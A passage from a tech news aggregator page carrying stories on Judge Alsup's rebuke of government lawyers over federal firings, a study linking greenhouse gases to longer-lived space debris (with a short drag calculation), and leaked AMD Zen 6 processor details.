Outlets report that Alsup became visibly upset with Trump Justice Department lawyers at various points throughout the hearing. “Come on, that’s a sham. Go ahead. It upsets me, I want you to know that. I’ve been practicing or serving in this court for over 50 years, and I know how do we get at the truth,” Alsup said. “And you’re not helping me get at the truth. You’re giving me press releases, sham documents.”

“It is sad, a sad day,” Alsup continued. “Our government would fire some good employee, and say it was based on performance. When they know good and well, that’s a lie.” He continued: “That should not have been done in our country. It was a sham in order to try to avoid statutory requirements.”

Alsup also ordered discovery and deposition in the case to provide greater transparency about the government’s activities. He further dissuaded the government from trying to paint him as some sort of leftist radical. “The words that I give you today should not be taken as some kind of ‘wild and crazy judge in San Francisco has said that the administration cannot engage in a reduction in force.’ I’m not saying that at all,” Alsup said. The judge noted that the government could not break the law or violate the Constitution while working on such an agenda: “Of course, if he does, it has to comply with the statutory requirements: the Reduction In Force act, the Civil Service Act, the Constitution, maybe other statutes,” Alsup said. “But it can be done.”


Original Submission

posted by hubie on Saturday March 15, @09:07AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Earth's atmosphere is shrinking due to climate change and one of the possible negative impacts is that space junk will stay in orbit for longer, bonk into other bits of space junk, and make so much mess that low Earth orbits become less useful.

That miserable set of predictions appeared on Monday in a Nature Sustainability paper titled "Greenhouse gases reduce the satellite carrying capacity of low Earth orbit."

Penned by two boffins from MIT, and another from the University of Birmingham, the paper opens with the observation: "Anthropogenic contributions of greenhouse gases in Earth's atmosphere have been observed to cause cooling and contraction in the thermosphere."

The thermosphere extends from about 90 km to 500 km above Earth's surface. While conditions in the thermosphere are hellish, it's not a hard vacuum. NASA describes it as home to "very low density of molecules" compared to the exosphere's "extremely low density."

Among the molecules found in the thermosphere is carbon dioxide (CO2), which conducts heat from lower down in the atmosphere and then radiates it outward.

"Thus, increasing concentrations of CO2 inevitably leads to cooling in the upper atmosphere. A consequence of cooling is a contraction of the global thermosphere, leading to reductions in mass density at constant altitude over time."

That's unwelcome because the very low density of matter in the thermosphere is still enough to create drag on craft in low Earth orbit – enough that the International Space Station requires regular boosts to stay in orbit.

It's also enough drag to gradually slow space junk, causing it to descend into denser parts of the atmosphere where it vaporizes. A less dense thermosphere, the authors warn, means more space junk orbiting for longer and the possibility of Kessler syndrome instability – space junk bumping into space junk and breaking it up into smaller pieces until there's so much space junk some orbits become too dangerous to host satellites.
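The mechanism can be sketched numerically: drag deceleration scales linearly with local air density (a = 0.5 · Cd · (A/m) · ρ · v²), so a thinner thermosphere brakes debris proportionally less. The parameter values below (drag coefficient, area-to-mass ratio, densities) are illustrative assumptions, not figures from the paper:

```python
# Back-of-the-envelope drag comparison. All parameter values here are
# illustrative assumptions, not figures from the paper.
def drag_deceleration(rho, v, cd=2.2, area_to_mass=0.01):
    """Drag deceleration (m/s^2) for an object with area-to-mass ratio
    area_to_mass (m^2/kg) moving at speed v (m/s) through air of
    density rho (kg/m^3): a = 0.5 * cd * (A/m) * rho * v**2."""
    return 0.5 * cd * area_to_mass * rho * v ** 2

v = 7_700.0              # typical low-Earth-orbit speed, m/s
rho_now = 1.0e-12        # assumed thermospheric density at some altitude
rho_cooler = 0.7e-12     # same altitude after an assumed 30% density drop

a_now = drag_deceleration(rho_now, v)
a_cooler = drag_deceleration(rho_cooler, v)

# Drag is linear in density, so a 30% thinner thermosphere brakes
# debris 30% more weakly, stretching out orbital decay times.
print(f"drag now:    {a_now:.3e} m/s^2")
print(f"drag cooler: {a_cooler:.3e} m/s^2")
print(f"ratio:       {a_cooler / a_now:.2f}")
```

The point of the sketch is only the linear scaling: whatever fraction the thermosphere's density drops by, debris sheds orbital energy that much more slowly at the same altitude.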

[...] The good news is the paper notes that satellite makers know Kessler syndrome instability is a possibility, so often build collision avoidance capabilities that let them avoid debris.

The authors hope manufacturers and operators work together on many debris-reduction tactics, and that greenhouse gas emissions are reduced to keep the thermosphere in fine trim.


Original Submission

posted by hubie on Saturday March 15, @04:22AM   Printer-friendly
from the mouthful-of-chiplets dept.

Arthur T Knackerbracket has processed the following story:

According to two leakers.

AMD’s upcoming Zen 6 processors will remain compatible with AM5, but they are set to introduce a new chiplet-based CPU design and significantly boost core counts across desktop and laptop products, according to sources cited by ChipHell as well as Moore's Law Is Dead. Premium processors for gamers will also feature 3D V-Cache.

AMD's next-generation Ryzen processors based on the Zen 6 microarchitecture will feature 12-core core chiplet dies (CCDs), marking a major shift from the eight-core CCDs used in Zen 3/4/5 generation processors, if the linked reports are accurate. As a result, desktop AM5 processors will be able to feature up to 24 cores. Meanwhile, advanced laptop APUs will transition from a four Zen 5 plus eight Zen 5c (4+8) configuration to a single 12-core CCD, at least according to MLID. A Zen 6 CCD measures 75mm^2, MLID claims.

Now, the increased number of cores is a big deal on its own. On top of that, premium versions of AMD's desktop processors will feature up to 96MB of L3 cache, or 4MB per core. That is in line with existing Zen 5 configurations, so AMD is not cutting down caches in favor of core count.
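The cache-per-core arithmetic is easy to verify from the figures quoted above (a quick check, not vendor data):

```python
# Quick check of the cache-per-core arithmetic quoted above.
cores_per_ccd = 12   # reported Zen 6 CCD core count
ccds = 2             # two CCDs on a top-end AM5 part
l3_total_mb = 96     # reported total L3 for premium desktop parts

cores = cores_per_ccd * ccds        # 24 cores
l3_per_core = l3_total_mb / cores   # MB of L3 per core

print(f"{cores} cores, {l3_per_core:.0f} MB of L3 per core")
```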

AMD is expected to release Zen 6-based products in 2026, so it is reasonable to expect them to use a more advanced node than today's (TSMC's 4nm-class). Think TSMC's N3P (3nm-class), given that AMD does not typically jump to leading-edge nodes (possibly due to supply constraints); the leading edge next year will be N2 (2nm-class).

AMD's Zen 6-based Ryzens for gaming PCs will also feature 3D V-Cache. Some laptop processors with built-in graphics will also feature 3D V-Cache, though the exact configurations remain to be seen.

Interestingly, and according to MLID, AMD's standard APUs will be chiplet-based, moving away from the monolithic approach. Medusa Point — a laptop APU — is expected to feature a Zen 6 CCD with 12 cores and a 200mm^2 I/O die (IOD), featuring eight RDNA work groups, a 128-bit memory controller, and a large NPU. There is speculation that Infinity Cache may be added to enhance GPU performance.

MLID also claims that the desktop counterpart of Medusa Point — allegedly called Medusa Ridge — will use up to two 12-core Zen 6 CCDs in the AM5 form factor. That product will have a 155mm^2 IOD without an advanced built-in GPU, but possibly with a large NPU.


Original Submission